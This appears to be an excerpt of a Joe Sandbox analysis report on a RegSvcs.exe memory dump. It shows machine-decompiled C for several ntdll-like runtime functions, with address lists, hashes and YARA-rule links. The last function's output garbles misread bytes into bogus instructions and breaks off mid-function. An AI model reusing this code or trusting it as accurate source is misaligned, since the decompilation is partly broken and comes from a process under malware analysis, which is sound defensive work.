Instruction Fuzzy Hash: 6E515A71A08345CFC720DF29C480A2ABBE6BB88710F69896FF98587355D775EC40DB92

Uniqueness

Uniqueness Score: -1.00%

Function 01063D40 Relevance: 1.6, APIs: 1, Instructions: 98
timeCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E01063D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x10ad360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E00FD2280(_t34, 0x10a8a6c);
				_t64 =  *0x10a5768; // 0x77995768
				if(_t64 != 0x10a5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77995770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E00FCFFB0(_t53, _t64, 0x10a8a6c);
						 *0x10ab1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E00FD2280(_t45, 0x10a8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x10a5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E00FCFFB0(_t51, _t64, 0x10a8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E00FFB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

0x01063d40
0x01063d48
0x01063d52
0x01063d59
0x01063d5d
0x01063d61
0x01063d63
0x01063d67
0x01063d69
0x01063d72
0x01063d76
0x01063d7a
0x01063d7f
0x01063d8b
0x01063d91
0x01063d91
0x01063d91
0x01063d94
0x01063d96
0x01063d9d
0x01063da1
0x01063db0
0x01063dba
0x01063dbc
0x01063dbc
0x01063dc6
0x01063dcb
0x01063dcf
0x01063dd1
0x01063dd4
0x00000000
0x00000000
0x01063dd9
0x01063e0c
0x01063e0c
0x01063e0f
0x01063ddb
0x01063ddb
0x01063de0
0x00000000
0x01063de2
0x01063de2
0x01063de4
0x01063de8
0x01063deb
0x01063df1
0x00000000
0x01063df3
0x01063df3
0x01063df5
0x01063df8
0x01063dfa
0x00000000
0x01063dfa
0x01063df1
0x01063de0
0x01063e11
0x01063e11
0x00000000
0x01063dfe
0x01063e04
0x01063e06
0x00000000
0x01063e06
0x00000000
0x01063e04
0x01063d91
0x01063e15
0x01063e1a
0x01063e1f
0x01063e1f
0x01063e23
0x01063e29
0x00000000
0x00000000
0x01063e2e
0x00000000
0x01063e30
0x01063e30
0x01063e35
0x00000000
0x01063e37
0x01063e3e
0x01063e42
0x01063e48
0x01063e4e
0x00000000
0x01063e4e
0x01063e35
0x00000000
0x01063e2e
0x01063e5b
0x01063e5c
0x01063e5d
0x01063e68
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 01063DB0

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 5c4f5117960fe68fda2a6493ef82e78c224ce34e5ef528dbc9e7b8f078e1e166
Instruction ID: 5541809180ac3eb23ed1074d148edf1eb9c4e51eb9b6e7523bcfa4a3c2aa9473
Opcode Fuzzy Hash: 5c4f5117960fe68fda2a6493ef82e78c224ce34e5ef528dbc9e7b8f078e1e166
Instruction Fuzzy Hash: 78314771609302DFC714DF58D98191ABBE5FF85705F4889AEF4889B291D730D904CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00FF4A2C Relevance: 1.6, APIs: 1, Instructions: 92
timeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00FF4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x10ad360 ^ _t62;
				_v8 =  *0x10ad360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E00FD2280(_t26, 0x10a8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E00FCFFB0(_t41, _t51, 0x10a8608);
						L2:
						 *0x10ab1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E00FFB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E00FD2280(_t28, 0x10a8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E00FCFFB0(_t42, _t53, 0x10a8608);
							if(_t53 != 0) {
								L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E00FCFFB0(_t41, _t51, 0x10a8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x00ff4a2c
0x00ff4a34
0x00ff4a3c
0x00ff4a3e
0x00ff4a48
0x00ff4a4b
0x00ff4a4d
0x00ff4a51
0x00ff4a9c
0x00000000
0x00000000
0x00ff4aa3
0x00ff4aa8
0x00ff4aad
0x00ff4ab1
0x00ff4ade
0x00ff4ae3
0x00ff4a5a
0x00ff4a62
0x00ff4a6a
0x00ff4a6e
0x0102f203
0x00ff4a84
0x00ff4a88
0x00ff4a89
0x00ff4a8a
0x00ff4a95
0x00ff4a95
0x00ff4a79
0x00ff4a80
0x00ff4af2
0x00ff4af4
0x00ff4af9
0x00ff4aff
0x00ff4b01
0x00ff4b03
0x00ff4b08
0x0102f20a
0x0102f212
0x0102f216
0x0102f216
0x00ff4b08
0x00ff4b13
0x00ff4b1a
0x0102f229
0x0102f229
0x00ff4b1a
0x00ff4a82
0x00000000
0x00ff4a82
0x00ff4ab7
0x00ff4acd
0x00ff4acd
0x00ff4ad5
0x00ff4ada
0x00000000
0x00ff4ada
0x00ff4ac2
0x00ff4acb
0x00000000
0x00000000
0x00000000
0x00ff4acb
0x00ff4a53
0x00ff4a53
0x00ff4a58
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 00FF4A62

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 660ae5ac6a1457b991b2c66e2efcffd550b4988c177ee822381b6a987318e17a
Instruction ID: 736388578632e060aee34cec8ac14e6c7db4d70f8499b9886e2a99931fec666c
Opcode Fuzzy Hash: 660ae5ac6a1457b991b2c66e2efcffd550b4988c177ee822381b6a987318e17a
Instruction Fuzzy Hash: 483143326412149BC7219F54C941B3BF7A1FF85B10F44852EFA924B661C778E804EB89

Uniqueness

Uniqueness Score: -1.00%

Function 00FD0050 Relevance: 1.6, APIs: 1, Instructions: 81
timeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00FD0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x10ad360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E00FE9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E00FFB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01088A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E00FE9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x10ab1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x00fd0055
0x00fd005d
0x00fd0062
0x00fd006c
0x00fd006f
0x00fd0074
0x00fd007a
0x00fd007a
0x00fd0080
0x00fd0080
0x00fd0087
0x00fd008d
0x00fd008f
0x00fd0093
0x00fd0095
0x00fd009b
0x00fd00f8
0x00fd00fb
0x00fd00fc
0x00fd00ff
0x00fd0108
0x00fd0108
0x00fd00a2
0x00fd00a6
0x00fd00b3
0x00fd00bc
0x00fd00c5
0x00fd00ca
0x0101c01e
0x00000000
0x00000000
0x0101c02d
0x00fd00d5
0x00fd00d9
0x0101c03d
0x0101c046
0x0101c046
0x00fd00df
0x00fd00e2
0x00fd00ea
0x00fd00ef
0x00fd00f2
0x00fd00f6
0x00fd0111
0x00fd0117
0x00fd0117
0x00000000
0x00fd00f6
0x00fd00d0
0x00fd00d0
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 00FD0111

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 4cdd1c90b172f30b99e041b4182bfd4281258640592ab1929f3d6cca8f59cb95
Instruction ID: c59000f83251d1f9e24489db159669186ede649da7de988608ee0629ebbe1f74
Opcode Fuzzy Hash: 4cdd1c90b172f30b99e041b4182bfd4281258640592ab1929f3d6cca8f59cb95
Instruction Fuzzy Hash: 86318E31601B04DFD722CB28C944B9AB3E6FF89714F18856EE59687B90EB75EC01DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00FE2581 Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00FE2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546911994) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t234;
				signed int _t238;
				char* _t239;
				char* _t241;
				signed int _t245;
				signed int _t247;
				intOrPtr _t249;
				signed int _t252;
				signed int _t259;
				signed int _t262;
				signed int _t270;
				signed int _t276;
				signed int _t278;
				void* _t280;
				signed int _t281;
				unsigned int _t284;
				signed int _t288;
				intOrPtr* _t289;
				signed int _t290;
				signed int _t294;
				intOrPtr _t309;
				signed int _t318;
				signed int _t320;
				signed int _t321;
				signed int _t325;
				signed int _t326;
				void* _t329;
				signed int _t330;
				signed int _t332;
				signed int _t335;
				char* _t336;
				void* _t338;

				_t332 = _t335;
				_t336 = _t335 - 0x4c;
				_v8 =  *0x10ad360 ^ _t332;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t325 = 0x10ab2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t284 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t276 = 0x48;
				_t304 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t318 = 0;
				_v37 = _t304;
				if(_v48 <= 0) {
					L16:
					_t45 = _t276 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t326 = 0xc0000106;
						goto L32;
					} else {
						_t325 = L00FD4620(_t284,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t276);
						_v52 = _t325;
						__eflags = _t325;
						if(_t325 == 0) {
							_t326 = 0xc0000017;
							goto L32;
						} else {
							 *(_t325 + 0x44) =  *(_t325 + 0x44) & 0x00000000;
							_t50 = _t325 + 0x48; // 0x48
							_t320 = _t50;
							_t304 = _v32;
							 *(_t325 + 0x3c) = _t276;
							_t278 = 0;
							 *((short*)(_t325 + 0x30)) = _v48;
							__eflags = _t304;
							if(_t304 != 0) {
								 *(_t325 + 0x18) = _t320;
								__eflags = _t304 - 0x10a8478;
								 *_t325 = ((0 | _t304 == 0x010a8478) - 0x00000001 & 0xfffffffb) + 7;
								E00FFF3E0(_t320,  *((intOrPtr*)(_t304 + 4)),  *_t304 & 0x0000ffff);
								_t304 = _v32;
								_t336 = _t336 + 0xc;
								_t278 = 1;
								__eflags = _a8;
								_t320 = _t320 + (( *_t304 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t270 = E010439F2(_t320);
									_t304 = _v32;
									_t320 = _t270;
								}
							}
							_t288 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t326 = _v68;
								__eflags = 0;
								 *((short*)(_t320 - 2)) = 0;
								goto L32;
							} else {
								_t276 = _t325 + _t278 * 4;
								_v56 = _t276;
								do {
									__eflags = _t304;
									if(_t304 != 0) {
										_t234 =  *(_v60 + _t288 * 4);
										__eflags = _t234;
										if(_t234 == 0) {
											goto L30;
										} else {
											__eflags = _t234 == 5;
											if(_t234 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t276 =  *(_v60 + _t288 * 4);
										 *(_t276 + 0x18) = _t320;
										_t238 =  *(_v60 + _t288 * 4);
										__eflags = _t238 - 8;
										if(_t238 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t238 * 4 +  &M00FE2959))) {
												case 0:
													__ax =  *0x10a8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E00FFF3E0(__edi,  *0x10a848c, __ax & 0x0000ffff);
														__eax =  *0x10a8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E00FFF3E0(_t320, _v80, _v64);
													_t265 = _v64;
													goto L26;
												case 2:
													 *0x10a8480 & 0x0000ffff = E00FFF3E0(__edi,  *0x10a8484,  *0x10a8480 & 0x0000ffff);
													__eax =  *0x10a8480 & 0x0000ffff;
													__eax = ( *0x10a8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E00FFF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E00FFF3E0(_t320, _v76, _v36);
														_t265 = _v36;
													}
													L26:
													_t336 = _t336 + 0xc;
													_t320 = _t320 + (_t265 >> 1) * 2 + 2;
													__eflags = _t320;
													L27:
													_push(0x3b);
													_pop(_t267);
													 *((short*)(_t320 - 2)) = _t267;
													goto L28;
												case 6:
													__ebx =  *0x10a575c;
													__eflags = __ebx - 0x10a575c;
													if(__ebx != 0x10a575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E00FFF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x10a575c;
														} while (__ebx != 0x10a575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x10a8478 & 0x0000ffff = E00FFF3E0(__edi,  *0x10a847c,  *0x10a8478 & 0x0000ffff);
													__eax =  *0x10a8478 & 0x0000ffff;
													__eax = ( *0x10a8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E010439F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x10a6e58 & 0x0000ffff = E00FFF3E0(__edi,  *0x10a6e5c,  *0x10a6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x10a6e58 & 0x0000ffff;
													__eax = ( *0x10a6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t288 = _v16;
													_t304 = _v32;
													L29:
													_t276 = _t276 + 4;
													__eflags = _t276;
													_v56 = _t276;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t288 = _t288 + 1;
									_v16 = _t288;
									__eflags = _t288 - _v48;
								} while (_t288 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t238 =  *(_v60 + _t318 * 4);
						if(_t238 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t238 * 4 +  &M00FE2935))) {
							case 0:
								__ax =  *0x10a8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t304 =  &_v64;
								_v80 = E00FE2E3E(0,  &_v64);
								_t276 = _t276 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x10a8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x10a8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E00FCEEF0(0x10a79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E00FCEB70(__ecx, 0x10a79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t212 = _v72;
											__eflags = _t212;
											if(_t212 != 0) {
												L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
											}
											_t213 = _v52;
											__eflags = _t213;
											if(_t213 != 0) {
												__eflags = _t326;
												if(_t326 < 0) {
													L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
													_t213 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t284 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x10a7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L00FD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E00FCEB70(__ecx, 0x10a79a0);
										__eax = _v52;
										L36:
										_pop(_t319);
										_pop(_t327);
										__eflags = _v8 ^ _t332;
										_pop(_t277);
										return E00FFB640(_t213, _t277, _v8 ^ _t332, _t304, _t319, _t327);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t272 = _v56;
								if(_v56 != 0) {
									_t304 =  &_v36;
									_t274 = E00FE2E3E(_t272,  &_v36);
									_t284 = _v36;
									_v76 = _t274;
								}
								if(_t284 == 0) {
									goto L44;
								} else {
									_t276 = _t276 + 2 + _t284;
								}
								goto L14;
							case 6:
								__eax =  *0x10a5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x10a8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x10a8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x10a6e58 & 0x0000ffff;
								__eax = ( *0x10a6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t318 = _t318 + 1;
								if(_t318 >= _v48) {
									goto L16;
								} else {
									_t304 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t289 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *_t238 =  *_t238 + 1;
					asm("o16 sub dh, bh");
					_t239 = _t238 + _t238;
					asm("daa");
					 *_t239 =  *_t239 + 1;
					 *[es:eax] =  *[es:eax] + 1;
					 *0x1f00fe26 =  *0x1f00fe26 + _t239;
					_pop(_t280);
					_t241 = _t336;
					_t338 = _t239 +  *_t289;
					 *0x201025b =  *0x201025b + _t304 - _t276 - _t280;
					_t329 = _t325 + 1 - _t320;
					 *((intOrPtr*)(_t241 - 0x9ff01d8)) =  *((intOrPtr*)(_t241 - 0x9ff01d8)) + _t241;
					asm("daa");
					 *_t241 =  *_t241 + 1;
					_push(ds);
					 *((intOrPtr*)(_t329 + 0x28)) =  *((intOrPtr*)(_t329 + 0x28)) + _t289;
					 *_t241 =  *_t241 + 1;
					asm("daa");
					 *_t241 =  *_t241 + 1;
					asm("fcomp dword [ebx+0x2]");
					 *((intOrPtr*)(_t241 +  &_a1546911994)) =  *((intOrPtr*)(_t241 +  &_a1546911994)) + _t329;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x108ff00);
					E0100D08C(_t280, _t320, _t329);
					_v44 =  *[fs:0x18];
					_t321 = 0;
					 *_a24 = 0;
					_t281 = _a12;
					__eflags = _t281;
					if(_t281 == 0) {
						_t245 = 0xc0000100;
					} else {
						_v8 = 0;
						_t330 = 0xc0000100;
						_v52 = 0xc0000100;
						_t247 = 4;
						while(1) {
							_v40 = _t247;
							__eflags = _t247;
							if(_t247 == 0) {
								break;
							}
							_t294 = _t247 * 0xc;
							_v48 = _t294;
							__eflags = _t281 -  *((intOrPtr*)(_t294 + 0xf91664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t262 = E00FFE5C0(_a8,  *((intOrPtr*)(_t294 + 0xf91668)), _t281);
									_t338 = _t338 + 0xc;
									__eflags = _t262;
									if(__eflags == 0) {
										_t330 = E010351BE(_t281,  *((intOrPtr*)(_v48 + 0xf9166c)), _a16, _t321, _t330, __eflags, _a20, _a24);
										_v52 = _t330;
										break;
									} else {
										_t247 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t247 = _t247 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t330;
						__eflags = _t330;
						if(_t330 < 0) {
							__eflags = _t330 - 0xc0000100;
							if(_t330 == 0xc0000100) {
								_t290 = _a4;
								__eflags = _t290;
								if(_t290 != 0) {
									_v36 = _t290;
									__eflags =  *_t290 - _t321;
									if( *_t290 == _t321) {
										_t330 = 0xc0000100;
										goto L76;
									} else {
										_t309 =  *((intOrPtr*)(_v44 + 0x30));
										_t249 =  *((intOrPtr*)(_t309 + 0x10));
										__eflags =  *((intOrPtr*)(_t249 + 0x48)) - _t290;
										if( *((intOrPtr*)(_t249 + 0x48)) == _t290) {
											__eflags =  *(_t309 + 0x1c);
											if( *(_t309 + 0x1c) == 0) {
												L106:
